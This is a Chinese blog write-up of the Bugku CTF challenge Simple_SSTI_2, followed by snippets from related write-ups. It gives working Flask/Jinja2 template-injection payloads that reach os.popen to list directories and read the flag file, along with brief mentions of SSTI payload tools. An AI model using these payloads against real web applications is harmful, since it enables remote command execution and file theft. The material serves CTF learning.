Bugku Simple_SSTI_2

最新推荐文章于 2024-04-21 18:47:10 发布
最新推荐文章于 2024-04-21 18:47:10 发布
阅读量2.4k 收藏 9
点赞数 4
分类专栏: web 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52718293/article/details/120893543
版权

在这里插入图片描述
首先打开之后是上面这样,题目有提示是ssti,所以看了一下各种关于ssti的介绍 暂推 ssti 然后其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于格式化字符串漏洞的文章(感觉学这个就是套娃啊,我都。。。)大概了解完之后

试着传错误语句,查看是什么类型的模板
python的flask模板注入
在这里插入图片描述
对于ssti,我们可以利用漏洞ls一下
/?flag={{%20config.class.init.globals[%27os%27].popen(%27ls%20…/%27).read()%20}}

其中
##class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
##init 初始化类,返回的类型是function
##globals[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
##os.popen() 方法用于从一个命令打开一个管道。
##open() 方法用于打开一个文件,并返回文件对象
(这部分解释来源https://www.cnblogs.com/xiaochaofang/p/14533709.html)
在这里插入图片描述
之后看到的是文件目录,有很多个文件,我们可以每个试试
比如说app文件 http://114.67.246.176:14925/?flag={{%20config.class.init.globals[%27os%27].popen(%27ls%20…/app/%27).read()%20}}
在这里插入图片描述
由于没有过滤直接cat就欧克了
在这里插入图片描述

*小瑶
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 600
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
Simple_SSTI_2
天天学安全专属博客
03-03 942
Simple_SSTI_2,backup靶场
bugku解题篇—Simple_SSTI_2
最新发布
XZ_______的博客
04-21 317
解题
[bugku]Simple_SSTI_2
ZhShy
03-10 3342
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2)
时光隧道
06-22 6073
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 580
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 3009
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI
03-09
SSTI
上传下载,图片上传,图片下载
11-22
1. 在第一个页面上实现上传图片到服务器上网站下的某个文件夹中...2. 再在第二个页面上实现上传图片到数据库中,然后用户能够查询到所有的上传图片,点击查询内容的图片名能够下载该图片 3. 以上2种方式都必须实现。
模板注入与_FLASK.pdf
01-02
**模板注入(SSTI)详解** 模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,...
BugKu Simple_SSTI_2 模板注入
weixin_68254517的博客
11-12 171
题目源码如下<head></head><body></body></html>解题方法为模板注入。解题方法:查看根目录?执行结果我们挨个查看目录,从第一个开始?执行结果直接查看flag文件?获得flag模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。
BugkuSimple_SSTI_2(小宇特详解)
小宇的web博客
06-17 2347
BugkuSimple_SSTI_2(小宇特详解) 1.这里还是提示模板注入。这里ls查看存在的文件 /?flag={{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }} 2.这里先查看app文件 ?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app/’).read() }} 3.这里由于没有过滤可以直接访问 ?flag={{ config.class.init.globals[
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1860
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
BugKu-Web-Simple_SSTI_1&Simple_SSTI_2(浅析SSTI模板注入!)
m0_73734159的博客
12-13 1119
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题。{{}}是模板变量的用法。在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。这些文件包含了程序运行所需的设置和参数,使得程序可以根据配置文件的内容进行适应性调整。唉,我不免耸了耸肩,有些无奈,并未发现什么有用的。对于这段命令,在第一题,我也是有所提及,相差不大。
BugKuSimple_SSTISSTI模板注入)
热门推荐
m0_54082441的博客
05-01 1万+
1.签到题 这个题相当easy了,只要按照描述来做,便能得到flag,答案如下: flag{BugKu-Sec-pwn!} 2.Simple_SSTI_1(SSTI模板注入) 点击链接进入,题目说: You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看,也可以右击页面--->“检查” 如图所示,我们会得到相关的提示,根据提示信息,我们利用flask的模板注入,就能直接得到flag。
BugkuSimple_SSTI_2
weixin_52599204的博客
08-05 393
然后发现里面直接显示了 那么接下来就是找系统命令执行语句的语法。由于题目提示是模板注入,于是直接上payload。说实话原来也没怎么了解过这个框架 于是找了找命令。首先打开环境 提示需要传一个flag参数。这里引用大佬的博客 感兴趣的可以去看看。找到圈起来这条 把里面的。...
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 510
BUGKU-WEB Simple_SSTI_2
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值